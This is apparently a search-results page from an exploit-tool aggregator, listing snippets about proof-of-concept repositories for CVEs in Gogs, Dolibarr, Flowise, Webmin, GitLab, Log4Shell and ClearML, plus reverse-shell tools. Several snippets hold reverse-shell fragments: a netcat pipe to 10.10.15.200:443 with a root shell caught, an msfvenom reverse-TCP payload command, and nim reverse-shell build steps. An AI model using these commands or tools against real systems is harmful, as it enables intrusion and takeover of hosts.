8650 matches found
CVE-2025-8110-PoC
CVE-2025-8110 概念验证 Python 概念验证脚本,针对 CVE-2025-8110 — Gogs v0.13.3 UpdateRepoFile 符号链接远程代码执行。单次攻击:恶意 PUT 请求本身触发 git fetch → sshCommand → 反弹 shell。 ⚠️ 仅供教育和授权安全研究使用。 针对你不拥有或未经书面许可测试的系统运行此工具是非法的。 详情 针对 CVE-2025-8110 的 PoC 受影响版本:Gogs v0.13.3 已修复版本:Gogs v0.13.4...
hacktivity-vulns-exploits-lab
Vulnerabilidades, Exploits y Payloads de Acceso Remoto — informe de laboratorio Mi recorrido y análisis de la hoja de Hacktivity Cyber Security Labs "Vulnerabilities, Exploits, and Remote Access Payloads" curso de Ethical Hacking y Penetration Testing, Leeds Beckett University. Cubre cómo las...
CVE-2026-23744-POC
CVE-2026-23744 — RCE no autenticado en MCPJam Inspector MCPJam Inspector -i -p -m...
CVE-2023-30253-exploit
CVE-2023-30253 — Dolibarr ERP/CRM 17.0.0 远程代码执行 针对 Dolibarr ERP/CRM v17.0.0 的 PHP 代码注入利用程序,允许通过 Website/CMS 模块以 www-data 用户身份获得 反向 shell 。 ⚠️ 仅限教育用途和授权审计。 📑 目录 什么是 CVE-2023-30253? 漏洞如何工作? 影响 此利用程序做什么? 要求 安装 用法 实际示例 利用程序逐步说明 缓解措施 参考...
CVE-2026-6009
⚠️ 免责声明: 本仓库仅用于教育目的和授权的安全测试。请勿对非您所有或未经您明确书面许可的系统使用。 CVE-2026-6009 概念验证 摘要 Jaspersoft report 库版本 = 7.0.3 存在通过利用 Java 反序列化流程导致的 远程代码执行 RCE 漏洞。此漏洞允许攻击者在使用该版本库的系统上建立反向 shell 连接。 库: Jaspersoft report 受影响版本: = 7.0.3 漏洞类型: 通过 Java 反序列化实现 RCE CVE-2026-6009 CVSS 评分: 8.7(高) 日期: 2026-05-19 漏洞描述...
CVE-2025-59528-Flowise-RCE
CVE-2025-59528-Flowise-RCE 针对 Flowise 版本 &1|nc 10.10.15.200 443 /tmp/f' 检查监听器,它应该会工作: root@kitploit: └─$ nc -lvnp 443 listening on any 443 ... connect to 10.10.15.200 from UNKNOWN 10.129.64.221 43393 sh: can't access tty; job control turned off / whoami root...
pickle_exploit
PickleExploit Demostración de una vulnerabilidad de ejecución remota de código mediante la serialización Pickle en ClearML 🖥️ Este script fue desarrollado por h3x0v3rl0rd. Esta prueba de concepto PoC demuestra una posible vulnerabilidad de seguridad relacionada con la serialización y...
php-reverse-shell
php-reverse-shell...
FreePBX-Reverse-Shell-Module
FreePBX-Reverse-Shell-Module...
synodecrypt
SynoDecrypt Una herramienta para descifrar todos los archivos cifrados de Synology SPK, PAT, .... El trabajo de ingeniería inversa se explica en nuestra entrada de blog. Instalación root@kitploit: pip install -r requirements.txt Uso Primero debes extraer las claves de cifrado y colocarlas en un...
nim-reverse-shell
nim-reverse-shell nim-reverse-shell Ejemplo: root@kitploit: sudo apt install nim actualiza el script en consecuencia root@kitploit: nim c -d:mingw --app:gui --opt:speed -o:spoofer-scheduler.exe reverse.nim root@kitploit: python3 -m http.server 8888 root@kitploit: wget...
Webmin1.910_exploit
Webmin 1.910 Exploit de Ejecución Remota de Código Descripción: Este repositorio contiene un script de Python 3 diseñado para explotar una vulnerabilidad de ejecución remota de código en Webmin versión 1.910. El script utiliza el endpoint sessionlogin.cgi para realizar la autenticación y desplega...
MS08-067
MS08-067 | CVE-2008-4250 Referencia: https://learn.microsoft.com/en-us/security-updates/SecurityBulletins/2008/ms08-067?redirectedfrom=MSDN Generación del Shellcode Usaremos msfvenom para generar el shellcode. root@kitploit: msfvenom -p windows/shellreversetcp LHOST=10.10.14.14 LPORT=443...
yealink_tools
Ingeniería inversa del firmware de Yealink Este repositorio contiene algunas utilidades de script utilizadas durante la ingeniería inversa del firmware de los teléfonos VoIP de Yealink. Para obtener más información sobre esta investigación, lea la entrada del blog...
Rainstorm
BadBash es una herramienta de explotación RCE para CVE-2014-6271. La versión básica solo verifica el sitio CGI HTTP y solo proporciona una shell inversa de netcat en el puerto 1234. Desarrollador : Andy Yang Versión : 0.1.0 Licencia : GPLv3...
PoC-CVE-2019-12840
CVE-2019-12840 Webmin 漏洞利用工具 该仓库包含一个利用 Webmin 的 CVE-2019-12840 漏洞的 Python 脚本。 描述 该脚本尝试登录 Webmin 服务器,然后利用 CVE-2019-12840 漏洞。脚本接受多个命令行参数,包括用于登录 Webmin 服务器的用户名和密码、服务器 URL、服务器端口、用于反向 Shell 的本地端口以及要在服务器上执行的命令。 用法 要使用此脚本,你至少需要提供用户名、密码和 Webmin 服务器 URL。以下是使用该脚本的示例: python exploit.py -U username -P passwo...
CVE-2021-44228
Log4Shell 概念验证 此仓库是 CVE-2021-44228 漏洞的概念验证。 它衍生自此仓库。 在此仓库中,我制作了一个易受攻击的应用程序示例,并演示了如何利用该漏洞。 概念验证组件 我已修改上游 Python 脚本,以自动化生成此漏洞。 此仓库中有两个 Dockerfile,可方便使用,如下所示: Docker-Ldap 在此 Docker 镜像中,我们从我的 Google Drive 下载 java jdk-8u20,因为您需要在 Oracle 上注册账号才能下载。 如果您不信任此来源,可以修改 Dockerfile 中的下载文件,并从此处下载 jdk(确保下载适用于...
ClearML-CVE-2024-24590
root@kitploit: / | | | / | | | \ / \ / | | | | | | \ / | | | | | | | | | | | | |/ / | '| |/| | | | /| | | | | | || | / | | | | | | | | | | | || | | |||,|| || ||| || / | - 2024-24590 x OxyDe ClearML Pickle 工件上传 PoC 本项目演示如何通过命令行参数动态上传 pickle 工件到 ClearML,并支持配置参数。该脚本初始化一个 ClearML 任务,动态配置反向...
gitlab-cve-2021-22205
gitlab-cve-2021-22205 一个简单的bash脚本,用于利用CVE-2021-22205攻击存在漏洞的gitlab实例 用法 root@kitploit: Usage: cve-2021-22205.sh options Options: -h,--help Show this help -t,--target Set the target server i.e. "http://gitlab.example.com" -i,--reverse-ip Set the IP to connect back to -p,--reverse-port Set the port ...